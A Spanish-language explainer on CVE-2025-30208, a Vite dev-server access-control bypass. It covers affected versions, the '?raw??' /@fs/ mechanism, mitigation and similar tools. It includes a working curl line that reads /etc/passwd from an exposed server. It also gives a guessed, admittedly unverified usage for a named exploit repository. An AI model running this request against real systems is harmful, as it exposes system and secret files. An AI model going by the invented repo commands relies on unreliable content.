🔍 Qué es CVE-2025-30208
Es una vulnerabilidad de bypass de control de acceso en el servidor de desarrollo de Vite (herramienta de desarrollo frontend) que permite a atacantes remotos leer archivos arbitrarios del sistema si el servidor está expuesto a la red mediante --host
o server.host
.
- Versiones afectadas: Vite < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10 .
- Mecanismo: Al añadir parámetros como
?raw??
o?import&raw??
a URLs que usan/@fs/
, se eluden las restricciones de acceso y se devuelve el contenido de archivos sensibles (ej./etc/passwd
) . - Gravedad: Media (CVSS 5.3), ya que puede provocar exposición de información confidencial .
⚙️ Cómo funcionaría el exploit
- Detección del objetivo: Identificar servidores Vite expuestos en puertos comunes (ej. 3000, 5173) usando herramientas como
nuclei
ohttpx
. - Explotación: Construir una URL maliciosa para acceder a archivos:
http://<TARGET_IP>:<PUERTO>/@fs/ruta/archivo?raw??
Ejemplo para leer /etc/passwd
:
curl http://192.168.1.100:3000/@fs/etc/passwd?raw??
- Extracción de datos: El servidor responde con el contenido del archivo si existe y es legible .
🛠️ Uso del repositorio de Dany60-98
Aunque no tenemos detalles específicos del repositorio mencionado, basándonos en herramientas similares , es probable que incluya:
- Requisitos: Python 3 y dependencias como
requests
. - Comandos típicos:
# Clonar el repositorio
git clone https://github.com/Dany60-98/CVE-2025-30208-EXP.git
cd CVE-2025-30208-EXP
# Ejecutar el exploit
python3 exploit.py -t http://192.168.1.100:3000 -f /etc/passwd
- Funcionalidades esperadas:
- Escaneo de múltiples objetivos.
- Prueba de archivos sensibles (ej.
.env
,config.json
) . - Exportación de resultados a JSON o HTML.
⚠️ Consideraciones éticas y técnicas
- Uso legítimo: Solo para pruebas de penetración autorizadas o verificación de entornos propios.
- Mitigación:
- Actualizar Vite a versiones parcheadas (ej. 6.2.3) .
- Restringir el acceso al servidor de desarrollo con reglas de firewall .
- Riesgos: Su uso no ético puede violar leyes de ciberseguridad.
📊 Tabla de herramientas similares (para referencia)
Herramienta | Enlace | Funcionalidad |
---|---|---|
Scanner avanzado | ThemeHackers/CVE-2025-30208 | Detección + explotación con 60+ payloads |
Nuclei template | imbas007/CVE-2025-30208-template | Escaneo automatizado con nuclei |
Script Bash | sumeet-darekar/CVE-2025-30208 | Detección + notificaciones Discord |